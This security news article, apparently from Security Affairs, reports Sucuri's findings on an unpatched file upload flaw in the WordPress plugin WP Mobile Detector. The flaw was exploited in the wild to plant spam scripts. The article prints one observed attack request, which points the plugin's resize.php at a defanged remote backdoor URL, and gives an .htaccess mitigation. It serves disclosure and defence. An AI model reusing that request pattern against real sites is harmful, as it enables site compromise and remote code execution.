Europe Confirms Record €4.1B Penalty Against Google for Android Practices|U.S. CISA adds a Microsoft SharePoint Server flaw to its Known Exploited Vulnerabilities catalog|430,000 FortiGate Devices Exposed in FortiBleed Ransomware Link|Adobe fixed multiple maximum-severity flaws in ColdFusion and Campaign Classic|Alleged Scattered Spider Hacker Extradited to U.S. to Face Cybercrime Charges|Oracle E-Business Suite Flaw Under Active Attack, 950 Systems Exposed|Azure CLI Targeted in LSHIY Password Spray Campaign Across 64 Orgs|CISA Warns BlueHammer Flaw Is Now Exploited in Ransomware Attacks|RustDuck: The Botnet That’s Still Small but Engineering Like It Plans to Grow|GuardFall Flaw Hits 10 of 11 Popular Open-Source AI Agents|XSS.is, The Forum That Ran the Ransomware Supply Chain Is Down. The Market Isn’t|U.S. CISA adds SimpleHelp flaw to its Known Exploited Vulnerabilities catalog|Europe Confirms Record €4.1B Penalty Against Google for Android Practices|U.S. CISA adds a Microsoft SharePoint Server flaw to its Known Exploited Vulnerabilities catalog|430,000 FortiGate Devices Exposed in FortiBleed Ransomware Link|Adobe fixed multiple maximum-severity flaws in ColdFusion and Campaign Classic|Alleged Scattered Spider Hacker Extradited to U.S. to Face Cybercrime Charges|Oracle E-Business Suite Flaw Under Active Attack, 950 Systems Exposed|Azure CLI Targeted in LSHIY Password Spray Campaign Across 64 Orgs|CISA Warns BlueHammer Flaw Is Now Exploited in Ransomware Attacks|RustDuck: The Botnet That’s Still Small but Engineering Like It Plans to Grow|GuardFall Flaw Hits 10 of 11 Popular Open-Source AI Agents|XSS.is, The Forum That Ran the Ransomware Supply Chain Is Down. The Market Isn’t|U.S. CISA adds SimpleHelp flaw to its Known Exploited Vulnerabilities catalog|
Advertisement

Ad Placeholder

Full Width × 90

Breaking News

10,000+ WordPress websites compromised due to a flaw in WP Mobile Detector plugin

More than 10,000 WordPress installations being exploited in the wild due to a vulnerability in the  WP Mobile Detector plugin. Security experts at Sucuri reported that a growing number of WordPress installations have been compromised by hackers exploiting a security flaw in a widely used plugin called WP Mobile Detector. The worrisome news is that […]

10,000+ WordPress websites compromised due to a flaw in WP Mobile Detector plugin

More than 10,000 WordPress installations being exploited in the wild due to a vulnerability in the  WP Mobile Detector plugin.

Security experts at Sucuri reported that a growing number of WordPress installations have been compromised by hackers exploiting a security flaw in a widely used plugin called WP Mobile Detector.

The worrisome news is that the vulnerability exploited by threat actors in the wild remains unpatched.

According to the experts at Sucuri, the hackers mainly exploited the flaw in the WP Mobile Detector plugin to install porn-related spamming scripts.

The plugin has been removed from the official WordPress plugin directory after the disclosure of the vulnerability.

“Our research team started to dig into the issue and found that the common denominator across these WordPress sites was the plugin WP Mobile Detector that had a 0-day arbitrary file upload vulnerability disclosed on May 31st. The plugin has since been removed from the WordPress repository and no patches are available.” reported a blog post published by Sucuri. “This vulnerability was publicly disclosed May 31st, but according to our firewall logs, the attack has been going since May 27th. “

It has been estimated that the plugin had more than 10,000 active installations, and many of them are still vulnerable to cyber attacks.

WP Mobile Detector plugin

The flaw results from the plugin failure of the input validation that allows attackers to submit malicious PHP code in input.

“The vulnerability is very easy to exploit,” continues Sucuri. “All the attacker needs to do is send a request to resize.php or timthumb.php (yes, timthumb, in this case it just includes resize.php), inside the plugin directory with the backdoor URL.”

This is one of the payloads we are actively seeing in the wild:

188.73.152.166 - - [31/May/2016:23:54:43 -0400] "POST /wp-content/plugins/wp-mobile-detector/resize.php
Payload:src=hxxp://copia[.]ru/mig/tmp/css.php"

The experts highlight that there is no fix available, this means that it is better to uninstall the flawed WP Mobile Detector plugin.

“We highly recommend everyone to remove this plugin for now. If you really need this plugin, the partial temporary fix will be to disable PHP execution in the wp-mobile-detector/cache subdirectory, for example using this code in the .htaccess file.”

<Files *.php>
deny from all
</Files>

Administrators of infected WordPress websites can request support to Sucuri.

If you appreciate my effort in spreading cyber security awareness, please vote for Security Affairs as best European Security Blog. Vote SecurityAffairs in every section it is reported. I’m one of the finalists and I want to demonstrate that the Security Affairs community a great reality.

https://www.surveymonkey.com/r/secbloggerwards2016

Thank you

Pierluigi

[adrotate banner=”9″]

Pierluigi Paganini

(Security Affairs – WP Mobile Detector, WordPress)